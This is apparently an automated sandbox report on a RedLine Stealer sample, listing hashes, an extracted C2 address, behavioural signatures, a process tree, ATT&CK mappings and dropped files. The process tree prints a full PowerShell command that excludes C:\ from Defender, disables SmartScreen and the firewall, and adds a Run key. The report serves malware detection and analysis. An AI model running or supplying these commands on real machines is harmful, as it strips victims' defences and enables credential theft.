Analysis

  • max time kernel
    149s
  • max time network
    132s
  • platform
    windows7_x64
  • resource
    win7-20220715-en
  • resource tags

    arch:x64arch:x86image:win7-20220715-enlocale:en-usos:windows7-x64system
  • submitted
    04-08-2022 11:37

General

  • Target

    e4.exe

  • Size

    4.5MB

  • MD5

    5c371f2d51427f39d793c6df8487346c

  • SHA1

    8bbc4272d6e36abf84a0d4fac47d49b690bfacdf

  • SHA256

    e42c63f0af341c2271346774a69bdbceed9cc21f041680bc00e8e0d137340b48

  • SHA512

    2f0d208bb52a44a085a9aa32169ba75ae3b5de2a552b2196532e59527eb7a0deb16fd87cc7363d7ec82627fdaba4ecf227bf2dd6da6331202a976a07c723ca34

Malware Config

Extracted

Family

redline

Botnet

1488

C2

46.21.250.111:65367

Attributes
  • auth_value

    e1f55d6c61f97af563fc8c06a2c97666

Signatures

  • Modifies security service 2 TTPs 1 IoCs
  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • RedLine payload 3 IoCs
  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 2 IoCs
  • Downloads MZ/PE file
  • Executes dropped EXE 4 IoCs
  • Modifies Windows Firewall 1 TTPs 1 IoCs
  • Checks BIOS information in registry 2 TTPs 4 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Drops startup file 1 IoCs
  • Loads dropped DLL 4 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Themida packer 12 IoCs

    Detects Themida, an advanced Windows software protection system.

  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 1 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Checks whether UAC is enabled 1 TTPs 2 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
  • Drops file in Windows directory 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Modifies data under HKEY_USERS 5 IoCs
  • Modifies system certificate store 2 TTPs 6 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 10 IoCs
  • Suspicious use of WriteProcessMemory 16 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\e4.exe
    "C:\Users\Admin\AppData\Local\Temp\e4.exe"
    1⤵
    • Identifies VirtualBox via ACPI registry values (likely anti-VM)
    • Checks BIOS information in registry
    • Loads dropped DLL
    • Checks whether UAC is enabled
    • Suspicious use of NtSetInformationThreadHideFromDebugger
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:1908
    • C:\Users\Admin\AppData\Local\Temp\TextOutputHost.exe
      "C:\Users\Admin\AppData\Local\Temp\TextOutputHost.exe"
      2⤵
      • Identifies VirtualBox via ACPI registry values (likely anti-VM)
      • Executes dropped EXE
      • Checks BIOS information in registry
      • Drops startup file
      • Loads dropped DLL
      • Checks whether UAC is enabled
      • Suspicious use of NtSetInformationThreadHideFromDebugger
      • Modifies system certificate store
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of WriteProcessMemory
      PID:1580
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" C:\ProgramData\UpSys.exe /SW:0 powershell.exe $(Add-MpPreference -ExclusionPath C:\); $(cd HKLM:\); $(New-ItemProperty –Path $HKLM\SOFTWARE\Policies\Microsoft\Windows\System –Name EnableSmartScreen -PropertyType DWord -Value 0); $(Set-ItemProperty -Path $HKLM\SYSTEM\CurrentControlSet\Services\mpssvc -Name Start -Value 4); $(netsh advfirewall set allprofiles state off); $(Get-Acl C:\ProgramData\Microsoft\Windows\SystemData | Set-Acl C:\ProgramData\MicrosoftNetwork); $(New-ItemProperty –Path $HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run –Name WinNet -PropertyType String -Value C:\ProgramData\MicrosoftNetwork\System.exe); $(New-Item -Path C:\ProgramData -Name check.txt -ItemType file -Value 1); $(exit)
        3⤵
        • Modifies security service
        • Loads dropped DLL
        • Adds Run key to start application
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:1496
        • C:\ProgramData\UpSys.exe
          "C:\ProgramData\UpSys.exe" /SW:0 powershell.exe
          4⤵
          • Executes dropped EXE
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:1608
          • C:\ProgramData\UpSys.exe
            "C:\ProgramData\UpSys.exe" /SW:0 powershell.exe
            5⤵
            • Executes dropped EXE
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:2000
            • C:\ProgramData\UpSys.exe
              "C:\ProgramData\UpSys.exe" /TI/ /SW:0 powershell.exe
              6⤵
              • Executes dropped EXE
              • Modifies data under HKEY_USERS
              • Suspicious use of WriteProcessMemory
              PID:1796
              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
                7⤵
                • Modifies data under HKEY_USERS
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                PID:336
        • C:\Windows\system32\netsh.exe
          "C:\Windows\system32\netsh.exe" advfirewall set allprofiles state off
          4⤵
          • Modifies Windows Firewall
          PID:1492
  • C:\Windows\system32\makecab.exe
    "C:\Windows\system32\makecab.exe" C:\Windows\Logs\CBS\CbsPersist_20220804113805.log C:\Windows\Logs\CBS\CbsPersist_20220804113805.cab
    1⤵
    • Drops file in Windows directory
    PID:1652

Network

MITRE ATT&CK Matrix ATT&CK v6

Persistence

Modify Existing Service

2
T1031

Registry Run Keys / Startup Folder

1
T1060

Defense Evasion

Modify Registry

3
T1112

Virtualization/Sandbox Evasion

1
T1497

Install Root Certificate

1
T1130

Credential Access

Credentials in Files

2
T1081

Discovery

Query Registry

3
T1012

Virtualization/Sandbox Evasion

1
T1497

System Information Discovery

3
T1082

Collection

Data from Local System

2
T1005

Command and Control

Web Service

1
T1102

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\ProgramData\UpSys.exe
    Filesize

    923KB

    MD5

    efe5769e37ba37cf4607cb9918639932

    SHA1

    f24ca204af2237a714e8b41d54043da7bbe5393b

    SHA256

    5f9dfd9557cf3ca96a4c7f190fc598c10f8871b1313112c9aea45dc8443017a2

    SHA512

    33794a567c3e16582da3c2ac8253b3e61df19c255985277c5a63a84a673ac64899e34e3b1ebb79e027f13d66a0b8800884cdd4d646c7a0abe7967b6316639cf1

  • C:\ProgramData\UpSys.exe
    Filesize

    923KB

    MD5

    efe5769e37ba37cf4607cb9918639932

    SHA1

    f24ca204af2237a714e8b41d54043da7bbe5393b

    SHA256

    5f9dfd9557cf3ca96a4c7f190fc598c10f8871b1313112c9aea45dc8443017a2

    SHA512

    33794a567c3e16582da3c2ac8253b3e61df19c255985277c5a63a84a673ac64899e34e3b1ebb79e027f13d66a0b8800884cdd4d646c7a0abe7967b6316639cf1

  • C:\ProgramData\UpSys.exe
    Filesize

    923KB

    MD5

    efe5769e37ba37cf4607cb9918639932

    SHA1

    f24ca204af2237a714e8b41d54043da7bbe5393b

    SHA256

    5f9dfd9557cf3ca96a4c7f190fc598c10f8871b1313112c9aea45dc8443017a2

    SHA512

    33794a567c3e16582da3c2ac8253b3e61df19c255985277c5a63a84a673ac64899e34e3b1ebb79e027f13d66a0b8800884cdd4d646c7a0abe7967b6316639cf1

  • C:\ProgramData\UpSys.exe
    Filesize

    923KB

    MD5

    efe5769e37ba37cf4607cb9918639932

    SHA1

    f24ca204af2237a714e8b41d54043da7bbe5393b

    SHA256

    5f9dfd9557cf3ca96a4c7f190fc598c10f8871b1313112c9aea45dc8443017a2

    SHA512

    33794a567c3e16582da3c2ac8253b3e61df19c255985277c5a63a84a673ac64899e34e3b1ebb79e027f13d66a0b8800884cdd4d646c7a0abe7967b6316639cf1

  • C:\Users\Admin\AppData\Local\Temp\TextOutputHost.exe
    Filesize

    3.4MB

    MD5

    55a6d22be09d762103ae315f97b58561

    SHA1

    f218c5bb6b7e3cbe9483f8bc4552edb180fd2bd1

    SHA256

    41d424435f37d0aa9dd6c2c2b05210f9e0a29a5969362776845064188f97273a

    SHA512

    4b8967e85ebca846bda3910dac537b360fd36163eb778b6f3c522273d9ac0ae2821536c50a40eb3b56938396166ab83d75e7999dc32fe8807d734a479bdce820

  • C:\Users\Admin\AppData\Local\Temp\TextOutputHost.exe
    Filesize

    3.4MB

    MD5

    55a6d22be09d762103ae315f97b58561

    SHA1

    f218c5bb6b7e3cbe9483f8bc4552edb180fd2bd1

    SHA256

    41d424435f37d0aa9dd6c2c2b05210f9e0a29a5969362776845064188f97273a

    SHA512

    4b8967e85ebca846bda3910dac537b360fd36163eb778b6f3c522273d9ac0ae2821536c50a40eb3b56938396166ab83d75e7999dc32fe8807d734a479bdce820

  • \ProgramData\MicrosoftNetwork\System.exe
    Filesize

    3.4MB

    MD5

    55a6d22be09d762103ae315f97b58561

    SHA1

    f218c5bb6b7e3cbe9483f8bc4552edb180fd2bd1

    SHA256

    41d424435f37d0aa9dd6c2c2b05210f9e0a29a5969362776845064188f97273a

    SHA512

    4b8967e85ebca846bda3910dac537b360fd36163eb778b6f3c522273d9ac0ae2821536c50a40eb3b56938396166ab83d75e7999dc32fe8807d734a479bdce820

  • \ProgramData\UpSys.exe
    Filesize

    923KB

    MD5

    efe5769e37ba37cf4607cb9918639932

    SHA1

    f24ca204af2237a714e8b41d54043da7bbe5393b

    SHA256

    5f9dfd9557cf3ca96a4c7f190fc598c10f8871b1313112c9aea45dc8443017a2

    SHA512

    33794a567c3e16582da3c2ac8253b3e61df19c255985277c5a63a84a673ac64899e34e3b1ebb79e027f13d66a0b8800884cdd4d646c7a0abe7967b6316639cf1

  • \Users\Admin\AppData\Local\Temp\TextOutputHost.exe
    Filesize

    3.4MB

    MD5

    55a6d22be09d762103ae315f97b58561

    SHA1

    f218c5bb6b7e3cbe9483f8bc4552edb180fd2bd1

    SHA256

    41d424435f37d0aa9dd6c2c2b05210f9e0a29a5969362776845064188f97273a

    SHA512

    4b8967e85ebca846bda3910dac537b360fd36163eb778b6f3c522273d9ac0ae2821536c50a40eb3b56938396166ab83d75e7999dc32fe8807d734a479bdce820

  • \Users\Admin\AppData\Local\Temp\TextOutputHost.exe
    Filesize

    3.4MB

    MD5

    55a6d22be09d762103ae315f97b58561

    SHA1

    f218c5bb6b7e3cbe9483f8bc4552edb180fd2bd1

    SHA256

    41d424435f37d0aa9dd6c2c2b05210f9e0a29a5969362776845064188f97273a

    SHA512

    4b8967e85ebca846bda3910dac537b360fd36163eb778b6f3c522273d9ac0ae2821536c50a40eb3b56938396166ab83d75e7999dc32fe8807d734a479bdce820

  • memory/336-99-0x000007FEF22C0000-0x000007FEF2E1D000-memory.dmp
    Filesize

    11.4MB

  • memory/336-95-0x0000000000000000-mapping.dmp
  • memory/336-98-0x000007FEF2E20000-0x000007FEF3843000-memory.dmp
    Filesize

    10.1MB

  • memory/336-100-0x0000000002624000-0x0000000002627000-memory.dmp
    Filesize

    12KB

  • memory/336-101-0x000000000262B000-0x000000000264A000-memory.dmp
    Filesize

    124KB

  • memory/336-103-0x000000000262B000-0x000000000264A000-memory.dmp
    Filesize

    124KB

  • memory/1492-85-0x0000000000000000-mapping.dmp
  • memory/1496-89-0x000000000250B000-0x000000000252A000-memory.dmp
    Filesize

    124KB

  • memory/1496-86-0x000000000250B000-0x000000000252A000-memory.dmp
    Filesize

    124KB

  • memory/1496-75-0x000007FEF3A50000-0x000007FEF4473000-memory.dmp
    Filesize

    10.1MB

  • memory/1496-77-0x000007FEF2CF0000-0x000007FEF384D000-memory.dmp
    Filesize

    11.4MB

  • memory/1496-79-0x0000000002504000-0x0000000002507000-memory.dmp
    Filesize

    12KB

  • memory/1496-73-0x0000000000000000-mapping.dmp
  • memory/1496-88-0x0000000002504000-0x0000000002507000-memory.dmp
    Filesize

    12KB

  • memory/1580-62-0x0000000000000000-mapping.dmp
  • memory/1580-94-0x0000000076CC0000-0x0000000076E69000-memory.dmp
    Filesize

    1.7MB

  • memory/1580-68-0x000000013F890000-0x00000001401E8000-memory.dmp
    Filesize

    9.3MB

  • memory/1580-70-0x000000013F890000-0x00000001401E8000-memory.dmp
    Filesize

    9.3MB

  • memory/1580-69-0x0000000076CC0000-0x0000000076E69000-memory.dmp
    Filesize

    1.7MB

  • memory/1580-71-0x000007FEFB6E1000-0x000007FEFB6E3000-memory.dmp
    Filesize

    8KB

  • memory/1580-102-0x00000000022C0000-0x00000000022D0000-memory.dmp
    Filesize

    64KB

  • memory/1580-67-0x000000013F890000-0x00000001401E8000-memory.dmp
    Filesize

    9.3MB

  • memory/1580-78-0x00000000022C0000-0x00000000022D0000-memory.dmp
    Filesize

    64KB

  • memory/1580-96-0x000000013F890000-0x00000001401E8000-memory.dmp
    Filesize

    9.3MB

  • memory/1608-82-0x0000000000000000-mapping.dmp
  • memory/1908-65-0x0000000000DA0000-0x0000000001872000-memory.dmp
    Filesize

    10.8MB

  • memory/1908-66-0x0000000076EA0000-0x0000000077020000-memory.dmp
    Filesize

    1.5MB

  • memory/1908-60-0x0000000076EA0000-0x0000000077020000-memory.dmp
    Filesize

    1.5MB

  • memory/1908-59-0x0000000000DA0000-0x0000000001872000-memory.dmp
    Filesize

    10.8MB

  • memory/1908-58-0x0000000000DA0000-0x0000000001872000-memory.dmp
    Filesize

    10.8MB

  • memory/1908-54-0x0000000074DB1000-0x0000000074DB3000-memory.dmp
    Filesize

    8KB

  • memory/1908-57-0x0000000000DA0000-0x0000000001872000-memory.dmp
    Filesize

    10.8MB